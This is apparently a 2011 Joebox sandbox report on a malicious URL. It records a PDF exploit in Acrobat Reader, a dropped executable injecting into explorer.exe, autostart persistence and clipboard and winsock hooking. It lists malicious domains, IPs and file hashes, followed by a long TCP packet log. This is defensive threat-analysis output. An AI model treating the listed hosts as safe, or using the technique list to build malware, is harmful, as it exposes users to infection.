ANALYSIS OVERVIEWNETWORK DATAHOOKSCOLLAPSE ALL

Joebox - Abstract Analysis File 10354
+ General information
Joebox version: 4.5.0
Start time: 14:51:28
Start date: 08/12/2011
Overall analysis duration: 0h 4m 8s
Target binary file name:
Target script file name: new_Mal_URL.jbs
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 1
Number of existing drivers analysed: 0
Number of injected processes analysed: 3
Errors:
  • Too many NtWriteVirtualMemory calls (excessive behavior)
  • Too many NtProtectVirtualMemory calls (excessive behavior)
  • Too many NtSetInformationFile calls (excessive behavior)
  • Too many NtReadVirtualMemory calls (excessive behavior)
+ Classification / Thread Score
Persistence, Installation, Boot Survival:
Hidding, Stealthness, Detection and Removal Protection:
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection:
Spreading:
Exploiting:
Networking:
Data spying, Sniffing, Keylogging, Ebanking Fraud:
+ Signature Detections
  • Creates files inside the user directory
  • Creates temporary files
  • Executable is probably coded in java
  • Executes batch files
  • Printf formatting strings found in memory and binary data
  • Queries a list of all running processes
  • Spawns processes
  • Urls found in memory or binary data
  • Creates an autostart registry key
  • Downloads files from webservers via HTTP
  • Found strings which match to known social media urls
  • Performs DNS lookups
  • Posts data to webserver
  • Registers a DLL
  • Allocates a big amount of executable memory (probably used for heap spraying)
  • Allocates memory in foreign processes
  • Creates a thread in another existing process (thread injection)
  • Disables the phising filter of internet explorer 8
  • Hooks clipboard functions (used to sniff clipboard data)
  • Hooks winsocket function (used for sniffing or altering network traffic)
  • Injects a PE file into a foreign processes
  • Modifies the prolog of usermode functions (usermode inline hooks)
  • PDF exploit detected (malicious Acrobat Reader behavior, loads network DLL)
  • Writes to foreign memory regions
Analysis Overview
+ Startup
  • system is xp2
  • iexplore.exe (PID: 1712 MD5: 55794B97A7FAABD2910873C85274F409)
    • AcroRd32.exe (PID: 1732 MD5: 80660C611B596FFE8AF4074B31AA6FB7)
      • regsvr32.exe (PID: 1008 MD5: FBDB9D0935B9907B809B381FDDF1627F)
      • regsvr32.exe (PID: 1852 MD5: FBDB9D0935B9907B809B381FDDF1627F)
    • 0.7663042396006076.exe (PID: 580 MD5: 74185020DEA5693BC25348C6AF34CF87)
      • rook.exe (PID: 488 MD5: 8EFB904B16A3F86CC163744D85AECB5F)
        • explorer.exe (PID: 1520 MD5: 12896823FB95BFB3DC9B46BCAEDC9923)
        • ctfmon.exe (PID: 1788 MD5: 5F1D5F88303D4A4DBC8E5F97BA967CC3)
        • wscntfy.exe (PID: 1860 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5)
      • cmd.exe (PID: 2152 MD5: 6D778E0F95447E6546553EEEA709D03C)
    • regsvr32.exe (PID: 652 MD5: FBDB9D0935B9907B809B381FDDF1627F)
    • regsvr32.exe (PID: 1004 MD5: FBDB9D0935B9907B809B381FDDF1627F)
  • cleanup
+ Dropped Files
File Path MD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat 7613D0FA5F4D15F16592A6830797CC32
C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 8EFB904B16A3F86CC163744D85AECB5F
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi 69C095F96CAA7BA8F677EC34D68E94F6
+ Involved Domains
Name IP Name Server ASN ASN Description ANS State Registrar e-Mail
firedepartment.mobi 174.121.93.116 ns2.firedepartment.mobi ns1.firedepartment.mobi unknown unknown US GoDaddy.com, Inc. (146) scall@srvfire.ca.gov
zespolpickup.pl 188.40.51.83 dns10.linuxpl.com ns10.linuxpl.com unknown unknown DE domeny@ConsultingService.pl
southfloridazulunation.com 97.74.215.96 ns32.domaincontrol.com ns31.domaincontrol.com unknown unknown US GODADDY.COM, INC. dinah.lopez@yahoo.com
combijump.com 46.45.137.206 0101domain1.mars.orderbox-dns.com 0101domain1.earth.orderbox-dns.com 0101domain1.venus.orderbox-dns.com 0101domain1.mercury.orderbox-dns.com unknown unknown TR 0101 INTERNET, INC. korpicsscan@skynet.be
+ Involved IP Addresses
IP ASN ASN Description ANS State
78.14.232.12 unknown unknown IT
125.27.159.156 unknown unknown TH
195.186.1.121 unknown unknown CH
195.186.4.121 unknown unknown CH
79.14.160.118 unknown unknown IT
Global Network Data
+ All TCP
Timestamp Source Port Dest Port Source IP Dest IP
Dec 8, 2011 14:52:25.810642958 CET 1060 80 192.168.0.13 174.121.93.116
Dec 8, 2011 14:52:25.810668945 CET 80 1060 174.121.93.116 192.168.0.13
Dec 8, 2011 14:52:25.812552929 CET 1060 80 192.168.0.13 174.121.93.116
Dec 8, 2011 14:52:25.828499079 CET 1060 80 192.168.0.13 174.121.93.116
Dec 8, 2011 14:52:25.828515053 CET 80 1060 174.121.93.116 192.168.0.13
Dec 8, 2011 14:52:41.196527958 CET 80 1060 174.121.93.116 192.168.0.13
Dec 8, 2011 14:52:41.329301119 CET 1060 80 192.168.0.13 174.121.93.116
Dec 8, 2011 14:52:41.329319954 CET 80 1060 174.121.93.116 192.168.0.13
Dec 8, 2011 14:52:41.548461914 CET 1060 80 192.168.0.13 174.121.93.116
Dec 8, 2011 14:52:45.476460934 CET 80 1060 174.121.93.116 192.168.0.13
Dec 8, 2011 14:52:45.476905107 CET 1060 80 192.168.0.13 174.121.93.116
Dec 8, 2011 14:52:46.328530073 CET 1060 80 192.168.0.13 174.121.93.116
Dec 8, 2011 14:52:53.446762085 CET 1061 80 192.168.0.13 188.40.51.83
Dec 8, 2011 14:52:53.446790934 CET 80 1061 188.40.51.83 192.168.0.13
Dec 8, 2011 14:52:53.447143078 CET 1061 80 192.168.0.13 188.40.51.83
Dec 8, 2011 14:52:53.480904102 CET 1061 80 192.168.0.13 188.40.51.83
Dec 8, 2011 14:52:53.480918884 CET 80 1061 188.40.51.83 192.168.0.13
Dec 8, 2011 14:52:58.175259113 CET 80 1061 188.40.51.83 192.168.0.13
Dec 8, 2011 14:52:58.179575920 CET 1061 80 192.168.0.13 188.40.51.83
Dec 8, 2011 14:52:58.179647923 CET 80 1061 188.40.51.83 192.168.0.13
Dec 8, 2011 14:52:58.179927111 CET 1061 80 192.168.0.13 188.40.51.83
Dec 8, 2011 14:52:59.785891056 CET 1062 80 192.168.0.13 97.74.215.96
Dec 8, 2011 14:52:59.785914898 CET 80 1062 97.74.215.96 192.168.0.13
Dec 8, 2011 14:52:59.786180973 CET 1062 80 192.168.0.13 97.74.215.96
Dec 8, 2011 14:52:59.798469067 CET 1062 80 192.168.0.13 97.74.215.96
Dec 8, 2011 14:52:59.798485041 CET 80 1062 97.74.215.96 192.168.0.13
Dec 8, 2011 14:53:01.639601946 CET 80 1062 97.74.215.96 192.168.0.13
Dec 8, 2011 14:53:01.778433084 CET 1062 80 192.168.0.13 97.74.215.96
Dec 8, 2011 14:53:02.229739904 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:02.229763985 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:02.230009079 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:02.240076065 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:02.240091085 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:12.882401943 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:12.992649078 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:12.993182898 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:12.993201971 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.074637890 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.075123072 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.075139046 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.100866079 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.101392031 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.101406097 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.101679087 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.184125900 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.185746908 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.186127901 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.186142921 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.186392069 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.210247040 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.277775049 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.278289080 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.278434038 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.297413111 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.303925991 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.304418087 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.326728106 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.326735973 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.327200890 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.327322006 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.412672997 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.418225050 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.418623924 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.418637991 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.419140100 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.419555902 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.441718102 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.442126989 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.500230074 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.582045078 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.582560062 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.582573891 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.582830906 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.607848883 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.634463072 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.634908915 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.634924889 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.635195971 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.716190100 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.717453003 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.717833996 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.717850924 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.826776981 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.827297926 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.827313900 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.827430964 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.887440920 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.887970924 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.888710976 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.889017105 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.889054060 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.889067888 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.889442921 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.949018955 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:13.949527025 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:13.949542999 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.005007982 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.005475044 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.005490065 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.035461903 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.035974979 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.035990000 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.036266088 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.085923910 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.112148046 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.112572908 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.112587929 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.138356924 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.138828993 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.138843060 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.139117956 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.145379066 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.164731979 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.165182114 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.165195942 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.165462017 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.196243048 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.197933912 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.198344946 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.198359966 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.222281933 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.222737074 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.222752094 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.223021984 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.254308939 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.292392969 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.292833090 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.292848110 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.309551954 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.309978962 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.309993029 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.358685970 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.359164000 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.359179974 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.359455109 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.369182110 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.369189024 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.369569063 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.392654896 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.393075943 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.393091917 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.395411968 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.395793915 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.395807028 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.396043062 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.449728966 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.451631069 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.451987028 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.451999903 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.452183962 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.452282906 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.452296019 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.452567101 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.477669001 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.477675915 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.478363037 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.478480101 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.478492022 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.501835108 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.502317905 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.502332926 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.502662897 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.504091978 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.504100084 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.504498005 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.504600048 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.533726931 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.576687098 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.577030897 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.577244997 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.577260017 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.577570915 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.577685118 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.584544897 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.599361897 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.599718094 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:14.599730968 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:14.793359041 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:25.272623062 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:25.272643089 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:26.431772947 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:26.431802988 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:26.433655977 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:26.495893002 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:26.495907068 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.364690065 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.568957090 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:28.568974018 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.787219048 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:28.787234068 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.822779894 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.823160887 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:28.823175907 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.823395967 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:28.939625025 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.965637922 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:28.966058969 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:28.966073990 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.072233915 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.072643042 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.072655916 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.169538975 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.169991016 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.170006037 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.170232058 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.195401907 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.339335918 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.339351892 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.378094912 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.378498077 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.378514051 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.378855944 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.513328075 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.539587021 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.540016890 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.540035009 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.565788031 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.566095114 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.566108942 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.747587919 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.751043081 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.751060009 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.754525900 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.775697947 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.803563118 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.803843021 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.803858995 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.804017067 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.818563938 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.829833031 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.830091953 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.830106974 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.830317974 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.919872999 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.922491074 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.946266890 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.946274996 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.947150946 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.972834110 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.973092079 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:29.973107100 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:29.973313093 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.003525972 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.029987097 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.031104088 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.031119108 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.031287909 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.070009947 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.113099098 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.113368034 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.113384008 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.122236967 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.122447968 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.122461081 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.123224974 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.144026995 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.161576033 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.161772966 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.161787987 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.170207977 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.171506882 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.171520948 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.171689987 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.201133966 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.287933111 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.288194895 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.288209915 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.314218998 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.314637899 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.314651966 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.314898014 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.333839893 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.340703964 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.341161966 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.341176033 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.341398954 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.377310038 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.397001982 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.400460958 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.400476933 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.403935909 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.404484987 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.404494047 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.407938004 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.421133041 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.491004944 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.558264017 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.558742046 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.558758974 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:30.559050083 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:30.574574947 CET 80 1063 46.45.137.206 192.168.0.13
